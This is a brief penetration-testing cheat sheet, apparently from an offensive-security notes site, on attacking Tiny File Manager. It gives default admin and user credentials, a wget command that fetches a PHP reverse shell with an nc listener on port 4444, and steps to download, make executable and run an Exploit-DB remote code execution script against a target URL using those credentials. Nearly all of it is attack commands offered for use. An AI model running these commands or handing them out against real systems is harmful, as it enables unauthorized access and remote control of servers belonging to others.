Tiny File Manager
Default Credentials
admin:admin@123
user:12345Reverse Shell
wget https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php -O shell.phpnc -lvnp 4444Remote Code Execution (RCE) Version≤2.4.6
wget https://www.exploit-db.com/raw/50828 -O exploit.sh
dos2unix exploit.sh
chmod +x exploit.sh
./exploit.sh http://vulnerable.com/index.php admin "admin@123"References
Last updated